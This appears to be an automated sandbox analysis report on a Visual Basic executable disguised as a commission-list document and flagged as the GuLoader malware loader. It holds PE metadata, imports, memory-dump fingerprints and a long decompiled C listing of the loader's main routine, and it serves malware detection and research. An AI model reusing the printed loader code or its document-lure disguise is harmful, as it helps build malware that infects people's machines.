lodsb
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
mov al, 8Fh
adc byte ptr [ebx], al
dec ebx
jne 00007F90EC8BD36Eh
insd
imul ebp, dword ptr [esi+65h], 666C6974h
add byte ptr [eax], ah
or byte ptr [ecx+00h], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
or al, 41h
in al, dx
out 9Dh, eax
sahf
or al, byte ptr [edi-4Dh]
cmpsd
adc dword ptr [edx-2Eh], edi
inc esi
wait
jbe 00007F90EC8BD2D4h
or byte ptr [ecx+44C5F4EFh], ch
mov cl, F3h
xchg eax, ebx
nop
cmp byte ptr [ebx+eax*8], cl
mov byte ptr [33AD4F3Ah], al
cdq
iretw
adc dword ptr [edi+00AA000Ch], esi
pushad
rcl dword ptr [ebx+00000000h], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push esp
adc byte ptr [eax], al
add byte ptr [ebp+0000000Eh], al
or al, byte ptr [eax]
push ebx
popad
outsb
outsb
arpl word ptr [edi+61h], bp
xor eax, 05010D00h
add byte ptr [ecx+4Eh], al
push ebx
dec ecx

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2f954	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x32000	0x41ae4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x16c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2ee9c	0x2f000	False	0.605172664561	data	7.14012596914	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x30000	0x11e8	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x32000	0x41ae4	0x42000	False	0.052353367661	data	2.16158172255	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x320e8	0x417e8	data
RT_GROUP_ICON	0x738d0	0x14	data
RT_VERSION	0x738e4	0x200	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaBoolStr, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaObjVar, __vbaI2I4, DllFunctionCall, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaStrToAnsi, __vbaFpI4, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0409 0x04b0
ProductVersion	1.04
InternalName	Wivrejaygeesca9
FileVersion	1.04
OriginalFilename	Wivrejaygeesca9.exe
ProductName	Kulminetilf

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: June-July_Commission_List_Summary-2021.exe PID: 1308 Parent PID: 5580

General

Start time:	09:33:24
Start date:	02/08/2021
Path:	C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe'
Imagebase:	0x400000
File size:	471040 bytes
MD5 hash:	BC6D6F6C55211E9FFC8972F330135DA7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: June-July_Commission_List_Summary-2021.exe PID: 1308 Parent PID: 5580 June-July_Commission_List_Summary-2021.exeCOMMON

Executed Functions

Function 0233A014, Relevance: 1.8, APIs: 1, Instructions: 277memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 0233A369

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 31a46a1eb1ba066bb267c9d6f493820e18d46bb4958eb3f67cb4d9c700bffd51
Instruction ID: ef0c1b18809bbab06555bd33cbc08c4d5ab2d5f77ecb8a0d570300217d89a2cd
Opcode Fuzzy Hash: 31a46a1eb1ba066bb267c9d6f493820e18d46bb4958eb3f67cb4d9c700bffd51
Instruction Fuzzy Hash: 80A164B1A08349DFDB259F64DD913EE77E2AF99340F51811EDCCAAB214D7348A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0233A07C, Relevance: 1.7, APIs: 1, Instructions: 214memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 0233A369

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 6847c3c68ea8be65604e97492221075a6d0e23b21b8dd4831ad017f9955468f8
Instruction ID: 160852d7eda68dda451fff66a97900e4a01052e484ba27174e8bb9cc61b29fea
Opcode Fuzzy Hash: 6847c3c68ea8be65604e97492221075a6d0e23b21b8dd4831ad017f9955468f8
Instruction Fuzzy Hash: FF518C764142456BD7255E24AC027FB7B79EFC3BA9F04C01BE9C78E600EB314D8386A1

Uniqueness

Uniqueness Score: -1.00%

Function 0233A23E, Relevance: 1.7, APIs: 1, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9763368f790fba46e68b4057bc29d45f1d9502c66f6473fd5d30c2f9cf250d66
Instruction ID: b28f29f30f2ca312a4b61869ecf3ad3152099d73ccc121b2267a25b6914debf3
Opcode Fuzzy Hash: 9763368f790fba46e68b4057bc29d45f1d9502c66f6473fd5d30c2f9cf250d66
Instruction Fuzzy Hash: C441297A4751456ADB2619286C12AF77B38FFC3F6AB44D40BE5C3CD900FA128A8346A5

Uniqueness

Uniqueness Score: -1.00%

Function 0233A19C, Relevance: 1.6, APIs: 1, Instructions: 115memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 0233A369

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 4a9459eaae03fc66d2532bf1ab38b115cc9d3a0a3a71079b4b76da59bc975101
Instruction ID: f62829e3afd2b3982cab799b6bba4d93984b751e1a5a83bc6f1bb2758f18e98b
Opcode Fuzzy Hash: 4a9459eaae03fc66d2532bf1ab38b115cc9d3a0a3a71079b4b76da59bc975101
Instruction Fuzzy Hash: 6B412571508384DFDB2A9F64ED817ED7BB2AF56354F04441EDCCA9B222D7348A45CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0233A307, Relevance: 1.6, APIs: 1, Instructions: 73memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 0233A369

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 3e9fb197c52d014e22f9ab271f359e35974836be8bfb93ee46033bc368b1c3a7
Instruction ID: 8db8e6d48080781f74659bce4d0755da0476cde55439840b26995a7a65166761
Opcode Fuzzy Hash: 3e9fb197c52d014e22f9ab271f359e35974836be8bfb93ee46033bc368b1c3a7
Instruction Fuzzy Hash: 4E212170A14349DFDB2A9E39AC443DE3792EF6A308F44454ADCC99B261DB31DA05CB44

Uniqueness

Uniqueness Score: -1.00%

Function 0042CD3C, Relevance: 286.6, APIs: 154, Strings: 9, Instructions: 1341
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0042CD3C(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				intOrPtr* _v0;
				signed int _v8;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v32;
				void* _v36;
				short _v40;
				intOrPtr _v44;
				short _v48;
				void* _v56;
				void* _v60;
				signed int _v64;
				char _v68;
				void* _v72;
				signed int _v80;
				long long _v84;
				char _v88;
				signed int _v92;
				short _v100;
				char _v104;
				intOrPtr _v112;
				intOrPtr _v116;
				void* _v120;
				signed int _v128;
				void* _v132;
				char _v136;
				char _v140;
				void* _v148;
				short _v168;
				void* _v172;
				signed int _v180;
				void* _v184;
				signed int _v188;
				void* _v200;
				long long _v216;
				signed int _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				intOrPtr _v240;
				signed int _v244;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v276;
				char _v284;
				char _v288;
				char _v292;
				char _v296;
				char _v300;
				signed int _v308;
				char _v316;
				char _v332;
				char _v348;
				char _v364;
				void* _v368;
				signed int _v372;
				long long _v384;
				intOrPtr _v388;
				char _v392;
				signed int _v396;
				signed int _v400;
				void* _v404;
				signed int _v408;
				short _v412;
				signed int _v436;
				intOrPtr _v440;
				signed int* _v456;
				signed int _v460;
				signed int _v464;
				signed int* _v468;
				signed int _v472;
				signed int _v476;
				signed int* _v480;
				signed int _v484;
				signed int _v488;
				signed int* _v492;
				signed int _v496;
				signed int _v500;
				signed int* _v504;
				signed int _v508;
				signed int _v512;
				signed int* _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int* _v532;
				signed int _v536;
				signed int _v540;
				signed int* _v544;
				signed int _v548;
				signed int _v552;
				signed int* _v556;
				signed int _v560;
				signed int _v564;
				signed int* _v568;
				signed int _v572;
				signed int _v576;
				signed int* _v580;
				signed int _v584;
				signed int _v588;
				signed int* _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _t642;
				signed int _t647;
				signed int _t651;
				signed int _t655;
				signed int _t662;
				signed int _t668;
				signed int _t687;
				signed int _t689;
				signed int _t691;
				signed int _t695;
				signed int _t699;
				signed int _t701;
				intOrPtr* _t702;
				signed int _t703;
				signed int _t707;
				intOrPtr* _t708;
				signed int _t709;
				signed int _t711;
				intOrPtr* _t712;
				signed int _t713;
				signed int _t715;
				intOrPtr* _t716;
				signed int _t717;
				signed int _t719;
				intOrPtr* _t720;
				signed char _t721;
				signed int _t728;
				signed int _t733;
				signed int _t740;
				signed int _t744;
				signed int _t750;
				signed int _t755;
				signed int _t762;
				signed int _t772;
				signed int _t777;
				signed int _t784;
				signed int _t793;
				signed int _t798;
				signed int _t807;
				signed int _t812;
				signed int _t813;
				signed int _t821;
				signed int _t825;
				signed int _t831;
				signed int _t836;
				signed int _t843;
				signed int _t848;
				void* _t849;
				intOrPtr* _t851;
				void* _t852;
				signed int* _t863;
				intOrPtr _t895;
				void* _t940;
				void* _t950;
				void* _t951;
				void* _t952;
				signed int _t959;
				intOrPtr* _t960;
				signed int _t961;
				intOrPtr* _t962;
				signed int _t964;
				intOrPtr* _t965;
				signed int _t966;
				intOrPtr* _t967;
				signed int _t968;
				intOrPtr* _t969;
				void* _t970;
				void* _t971;
				void* _t973;
				intOrPtr _t974;
				void* _t976;
				intOrPtr _t977;
				signed int _t986;

				_t952 = __esi;
				_t950 = __edi;
				_t849 = __ebx;
				_t971 = _t973;
				_t974 = _t973 - 0x18;
				 *[fs:0x0] = _t974;
				L004013A0();
				_v28 = _t974;
				_v24 = 0x4011b8;
				_v20 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				_v16 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4013a6, _t970);
				_v8 = 1;
				_v8 = 2;
				if( *0x43039c != 0) {
					_v456 = 0x43039c;
				} else {
					_push(0x43039c);
					_push(0x40398c);
					L00401592();
					_v456 = 0x43039c;
				}
				_v396 =  *_v456;
				_t642 =  *((intOrPtr*)( *_v396 + 0x14))(_v396,  &_v236);
				asm("fclex");
				_v400 = _t642;
				__eflags = _v400;
				if(_v400 >= 0) {
					_t26 =  &_v460;
					 *_t26 = _v460 & 0x00000000;
					__eflags =  *_t26;
				} else {
					_push(0x14);
					_push(0x40397c);
					_push(_v396);
					_push(_v400);
					L0040158C();
					_v460 = _t642;
				}
				_v404 = _v236;
				_t647 =  *((intOrPtr*)( *_v404 + 0x100))(_v404,  &_v372);
				asm("fclex");
				_v408 = _t647;
				__eflags = _v408;
				if(_v408 >= 0) {
					_t39 =  &_v464;
					 *_t39 = _v464 & 0x00000000;
					__eflags =  *_t39;
				} else {
					_push(0x100);
					_push(0x40399c);
					_push(_v404);
					_push(_v408);
					L0040158C();
					_v464 = _t647;
				}
				__eflags = _v372 - 0x400000;
				_v412 =  ~(0 | _v372 != 0x00400000);
				L00401586();
				_t651 = _v412;
				__eflags = _t651;
				if(_t651 != 0) {
					_v8 = 3;
					__eflags =  *0x43039c;
					if( *0x43039c != 0) {
						_v468 = 0x43039c;
					} else {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
						_v468 = 0x43039c;
					}
					_v396 =  *_v468;
					_t821 =  *((intOrPtr*)( *_v396 + 0x14))(_v396,  &_v236);
					asm("fclex");
					_v400 = _t821;
					__eflags = _v400;
					if(_v400 >= 0) {
						_t61 =  &_v472;
						 *_t61 = _v472 & 0x00000000;
						__eflags =  *_t61;
					} else {
						_push(0x14);
						_push(0x40397c);
						_push(_v396);
						_push(_v400);
						L0040158C();
						_v472 = _t821;
					}
					_v404 = _v236;
					_t825 =  *((intOrPtr*)( *_v404 + 0x138))(_v404, L"SYLFIDENS", 1);
					asm("fclex");
					_v408 = _t825;
					__eflags = _v408;
					if(_v408 >= 0) {
						_t73 =  &_v476;
						 *_t73 = _v476 & 0x00000000;
						__eflags =  *_t73;
					} else {
						_push(0x138);
						_push(0x40399c);
						_push(_v404);
						_push(_v408);
						L0040158C();
						_v476 = _t825;
					}
					L00401586();
					_v8 = 4;
					__eflags =  *0x43039c;
					if( *0x43039c != 0) {
						_v480 = 0x43039c;
					} else {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
						_v480 = 0x43039c;
					}
					_v396 =  *_v480;
					_t831 =  *((intOrPtr*)( *_v396 + 0x14))(_v396,  &_v236);
					asm("fclex");
					_v400 = _t831;
					__eflags = _v400;
					if(_v400 >= 0) {
						_t90 =  &_v484;
						 *_t90 = _v484 & 0x00000000;
						__eflags =  *_t90;
					} else {
						_push(0x14);
						_push(0x40397c);
						_push(_v396);
						_push(_v400);
						L0040158C();
						_v484 = _t831;
					}
					_v404 = _v236;
					_t836 =  *((intOrPtr*)( *_v404 + 0x140))(_v404,  &_v368);
					asm("fclex");
					_v408 = _t836;
					__eflags = _v408;
					if(_v408 >= 0) {
						_t103 =  &_v488;
						 *_t103 = _v488 & 0x00000000;
						__eflags =  *_t103;
					} else {
						_push(0x140);
						_push(0x40399c);
						_push(_v404);
						_push(_v408);
						L0040158C();
						_v488 = _t836;
					}
					_v40 = _v368;
					L00401586();
					_v8 = 5;
					__eflags =  *0x43039c;
					if( *0x43039c != 0) {
						_v492 = 0x43039c;
					} else {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
						_v492 = 0x43039c;
					}
					_v396 =  *_v492;
					_t843 =  *((intOrPtr*)( *_v396 + 0x14))(_v396,  &_v236);
					asm("fclex");
					_v400 = _t843;
					__eflags = _v400;
					if(_v400 >= 0) {
						_t122 =  &_v496;
						 *_t122 = _v496 & 0x00000000;
						__eflags =  *_t122;
					} else {
						_push(0x14);
						_push(0x40397c);
						_push(_v396);
						_push(_v400);
						L0040158C();
						_v496 = _t843;
					}
					_v404 = _v236;
					_t848 =  *((intOrPtr*)( *_v404 + 0x68))(_v404,  &_v368);
					asm("fclex");
					_v408 = _t848;
					__eflags = _v408;
					if(_v408 >= 0) {
						_t135 =  &_v500;
						 *_t135 = _v500 & 0x00000000;
						__eflags =  *_t135;
					} else {
						_push(0x68);
						_push(0x40399c);
						_push(_v404);
						_push(_v408);
						L0040158C();
						_v500 = _t848;
					}
					_t651 = _v368;
					_v92 = _t651;
					L00401586();
					_v8 = 6;
					_push(L"Austrogaean3");
					L004014E4();
				}
				_v8 = 8;
				_push(0x403a84);
				_push(0x403a8c);
				L00401532();
				L00401598();
				_push(_t651);
				_push(0x403a94);
				L00401532();
				L00401598();
				_push(_t651);
				_push(0x403aa0);
				L00401532();
				L00401598();
				_push(_t651);
				_push(0x403a84);
				L00401532();
				L00401598();
				_push(_t651);
				_push(0x403a8c);
				L00401532();
				_v244 = _t651;
				_v252 = 8;
				_push( &_v252);
				_push( &_v268); // executed
				L004014D8(); // executed
				_v308 = 0xa;
				_v316 = 0x8002;
				_push( &_v268);
				_t655 =  &_v316;
				_push(_t655);
				L004014DE();
				_v396 = _t655;
				_push( &_v232);
				_push( &_v228);
				_push( &_v224);
				_push( &_v220);
				_push(4);
				L004014D2();
				_push( &_v268);
				_push( &_v252);
				_push(2);
				L00401562();
				_t976 = _t974 + 0x20;
				_t662 = _v396;
				__eflags = _t662;
				if(_t662 != 0) {
					_v8 = 9;
					__eflags =  *0x43039c;
					if( *0x43039c != 0) {
						_v504 = 0x43039c;
					} else {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
						_v504 = 0x43039c;
					}
					_v396 =  *_v504;
					_t793 =  *((intOrPtr*)( *_v396 + 0x14))(_v396,  &_v236);
					asm("fclex");
					_v400 = _t793;
					__eflags = _v400;
					if(_v400 >= 0) {
						_t176 =  &_v508;
						 *_t176 = _v508 & 0x00000000;
						__eflags =  *_t176;
					} else {
						_push(0x14);
						_push(0x40397c);
						_push(_v396);
						_push(_v400);
						L0040158C();
						_v508 = _t793;
					}
					_v404 = _v236;
					_t798 =  *((intOrPtr*)( *_v404 + 0xf8))(_v404,  &_v220);
					asm("fclex");
					_v408 = _t798;
					__eflags = _v408;
					if(_v408 >= 0) {
						_t189 =  &_v512;
						 *_t189 = _v512 & 0x00000000;
						__eflags =  *_t189;
					} else {
						_push(0xf8);
						_push(0x40399c);
						_push(_v404);
						_push(_v408);
						L0040158C();
						_v512 = _t798;
					}
					_v436 = _v220;
					_v220 = _v220 & 0x00000000;
					L00401598();
					L00401586();
					_v8 = 0xa;
					_push(1);
					_push(1);
					_push(1);
					_push( &_v252);
					L004014CC();
					_push( &_v252);
					L0040156E();
					L00401598();
					L00401550();
					_v8 = 0xb;
					__eflags =  *0x43039c;
					if( *0x43039c != 0) {
						_v516 = 0x43039c;
					} else {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
						_v516 = 0x43039c;
					}
					_v396 =  *_v516;
					_t807 =  *((intOrPtr*)( *_v396 + 0x14))(_v396,  &_v236);
					asm("fclex");
					_v400 = _t807;
					__eflags = _v400;
					if(_v400 >= 0) {
						_t217 =  &_v520;
						 *_t217 = _v520 & 0x00000000;
						__eflags =  *_t217;
					} else {
						_push(0x14);
						_push(0x40397c);
						_push(_v396);
						_push(_v400);
						L0040158C();
						_v520 = _t807;
					}
					_v404 = _v236;
					_t812 =  *((intOrPtr*)( *_v404 + 0xf0))(_v404,  &_v220);
					asm("fclex");
					_v408 = _t812;
					__eflags = _v408;
					if(_v408 >= 0) {
						_t230 =  &_v524;
						 *_t230 = _v524 & 0x00000000;
						__eflags =  *_t230;
					} else {
						_push(0xf0);
						_push(0x40399c);
						_push(_v404);
						_push(_v408);
						L0040158C();
						_v524 = _t812;
					}
					_t813 = _v220;
					_v440 = _t813;
					_v220 = _v220 & 0x00000000;
					L00401598();
					L00401586();
					_v8 = 0xc;
					L004014C6();
					_t662 =  *((intOrPtr*)( *_a4 + 0x64))(_a4, _t813);
					asm("fclex");
					_v396 = _t662;
					__eflags = _v396;
					if(_v396 >= 0) {
						_t248 =  &_v528;
						 *_t248 = _v528 & 0x00000000;
						__eflags =  *_t248;
					} else {
						_push(0x64);
						_push(0x4034b4);
						_push(_a4);
						_push(_v396);
						L0040158C();
						_v528 = _t662;
					}
				}
				_v8 = 0xe;
				E00403914();
				_v372 = _t662;
				L004014C0();
				__eflags = _v372 - 0x5cf000;
				if(_v372 == 0x5cf000) {
					_v8 = 0xf;
					__eflags =  *0x43039c;
					if( *0x43039c != 0) {
						_v532 = 0x43039c;
					} else {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
						_v532 = 0x43039c;
					}
					_v396 =  *_v532;
					_t772 =  *((intOrPtr*)( *_v396 + 0x14))(_v396,  &_v236);
					asm("fclex");
					_v400 = _t772;
					__eflags = _v400;
					if(_v400 >= 0) {
						_t267 =  &_v536;
						 *_t267 = _v536 & 0x00000000;
						__eflags =  *_t267;
					} else {
						_push(0x14);
						_push(0x40397c);
						_push(_v396);
						_push(_v400);
						L0040158C();
						_v536 = _t772;
					}
					_v404 = _v236;
					_t777 =  *((intOrPtr*)( *_v404 + 0xb8))(_v404,  &_v368);
					asm("fclex");
					_v408 = _t777;
					__eflags = _v408;
					if(_v408 >= 0) {
						_t280 =  &_v540;
						 *_t280 = _v540 & 0x00000000;
						__eflags =  *_t280;
					} else {
						_push(0xb8);
						_push(0x40399c);
						_push(_v404);
						_push(_v408);
						L0040158C();
						_v540 = _t777;
					}
					_v48 = _v368;
					L00401586();
					_v8 = 0x10;
					L00401580();
					L00401598();
					_v8 = 0x11;
					L0040151A();
					_v8 = 0x12;
					__eflags =  *0x43039c;
					if( *0x43039c != 0) {
						_v544 = 0x43039c;
					} else {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
						_v544 = 0x43039c;
					}
					_v396 =  *_v544;
					_t784 =  *((intOrPtr*)( *_v396 + 0x1c))(_v396,  &_v236);
					asm("fclex");
					_v400 = _t784;
					__eflags = _v400;
					if(_v400 >= 0) {
						_t302 =  &_v548;
						 *_t302 = _v548 & 0x00000000;
						__eflags =  *_t302;
					} else {
						_push(0x1c);
						_push(0x40397c);
						_push(_v396);
						_push(_v400);
						L0040158C();
						_v548 = _t784;
					}
					_v404 = _v236;
					_t662 =  *((intOrPtr*)( *_v404 + 0x50))(_v404);
					asm("fclex");
					_v408 = _t662;
					__eflags = _v408;
					if(_v408 >= 0) {
						_t314 =  &_v552;
						 *_t314 = _v552 & 0x00000000;
						__eflags =  *_t314;
					} else {
						_push(0x50);
						_push(0x4039d4);
						_push(_v404);
						_push(_v408);
						L0040158C();
						_v552 = _t662;
					}
					L00401586();
				}
				_v8 = 0x14;
				_push(0x403aac);
				_push(0x403ab4);
				L00401532();
				L00401598();
				_push(_t662);
				L00401574();
				_push(_t662);
				L004014B4();
				L00401598();
				_push(_t662);
				_push(0x403abc);
				L004014BA();
				asm("sbb eax, eax");
				_v396 =  ~( ~( ~_t662));
				_push( &_v224);
				_push( &_v220);
				_push(2);
				L004014D2();
				_t977 = _t976 + 0xc;
				_t668 = _v396;
				__eflags = _t668;
				if(_t668 != 0) {
					_v8 = 0x15;
					L00401580();
					L00401598();
					_v8 = 0x16;
					_t327 =  &_v244;
					 *_t327 = _v244 & 0x00000000;
					__eflags =  *_t327;
					_v252 = 2;
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xffffffff);
					_push( &_v252);
					L004014F6();
					L00401598();
					L00401550();
					_v8 = 0x17;
					_v244 = 2;
					_v252 = 2;
					_t668 =  &_v252;
					_push(_t668);
					L004014AE();
					L00401598();
					L00401550();
					_v8 = 0x18;
					_v8 = 0x19;
					_push(0x7b);
					L004014A8();
					_v188 = _t668;
				}
				_v8 = 0x1b;
				E00403914();
				_v372 = _t668;
				L004014C0();
				__eflags = _v372 - 0x1f5459;
				if(_v372 == 0x1f5459) {
					_v8 = 0x1c;
					__eflags =  *0x43039c;
					if( *0x43039c != 0) {
						_v556 = 0x43039c;
					} else {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
						_v556 = 0x43039c;
					}
					_v396 =  *_v556;
					_t750 =  *((intOrPtr*)( *_v396 + 0x14))(_v396,  &_v236);
					asm("fclex");
					_v400 = _t750;
					__eflags = _v400;
					if(_v400 >= 0) {
						_t359 =  &_v560;
						 *_t359 = _v560 & 0x00000000;
						__eflags =  *_t359;
					} else {
						_push(0x14);
						_push(0x40397c);
						_push(_v396);
						_push(_v400);
						L0040158C();
						_v560 = _t750;
					}
					_v404 = _v236;
					_t755 =  *((intOrPtr*)( *_v404 + 0xb8))(_v404,  &_v368);
					asm("fclex");
					_v408 = _t755;
					__eflags = _v408;
					if(_v408 >= 0) {
						_t372 =  &_v564;
						 *_t372 = _v564 & 0x00000000;
						__eflags =  *_t372;
					} else {
						_push(0xb8);
						_push(0x40399c);
						_push(_v404);
						_push(_v408);
						L0040158C();
						_v564 = _t755;
					}
					_v168 = _v368;
					L00401586();
					_v8 = 0x1d;
					L00401580();
					L00401598();
					_v8 = 0x1e;
					L0040151A();
					_v8 = 0x1f;
					__eflags =  *0x43039c;
					if( *0x43039c != 0) {
						_v568 = 0x43039c;
					} else {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
						_v568 = 0x43039c;
					}
					_v396 =  *_v568;
					_t762 =  *((intOrPtr*)( *_v396 + 0x1c))(_v396,  &_v236);
					asm("fclex");
					_v400 = _t762;
					__eflags = _v400;
					if(_v400 >= 0) {
						_t394 =  &_v572;
						 *_t394 = _v572 & 0x00000000;
						__eflags =  *_t394;
					} else {
						_push(0x1c);
						_push(0x40397c);
						_push(_v396);
						_push(_v400);
						L0040158C();
						_v572 = _t762;
					}
					_v404 = _v236;
					_t668 =  *((intOrPtr*)( *_v404 + 0x50))(_v404);
					asm("fclex");
					_v408 = _t668;
					__eflags = _v408;
					if(_v408 >= 0) {
						_t406 =  &_v576;
						 *_t406 = _v576 & 0x00000000;
						__eflags =  *_t406;
					} else {
						_push(0x50);
						_push(0x4039d4);
						_push(_v404);
						_push(_v408);
						L0040158C();
						_v576 = _t668;
					}
					L00401586();
				}
				_v8 = 0x21;
				E00403914();
				_v372 = _t668;
				L004014C0();
				__eflags = _v372 - 0x73da0a;
				if(_v372 == 0x73da0a) {
					_v8 = 0x22;
					__eflags =  *0x43039c;
					if( *0x43039c != 0) {
						_v580 = 0x43039c;
					} else {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
						_v580 = 0x43039c;
					}
					_v396 =  *_v580;
					_t728 =  *((intOrPtr*)( *_v396 + 0x14))(_v396,  &_v236);
					asm("fclex");
					_v400 = _t728;
					__eflags = _v400;
					if(_v400 >= 0) {
						_t426 =  &_v584;
						 *_t426 = _v584 & 0x00000000;
						__eflags =  *_t426;
					} else {
						_push(0x14);
						_push(0x40397c);
						_push(_v396);
						_push(_v400);
						L0040158C();
						_v584 = _t728;
					}
					_v404 = _v236;
					_t733 =  *((intOrPtr*)( *_v404 + 0xb8))(_v404,  &_v368);
					asm("fclex");
					_v408 = _t733;
					__eflags = _v408;
					if(_v408 >= 0) {
						_t439 =  &_v588;
						 *_t439 = _v588 & 0x00000000;
						__eflags =  *_t439;
					} else {
						_push(0xb8);
						_push(0x40399c);
						_push(_v404);
						_push(_v408);
						L0040158C();
						_v588 = _t733;
					}
					_v100 = _v368;
					L00401586();
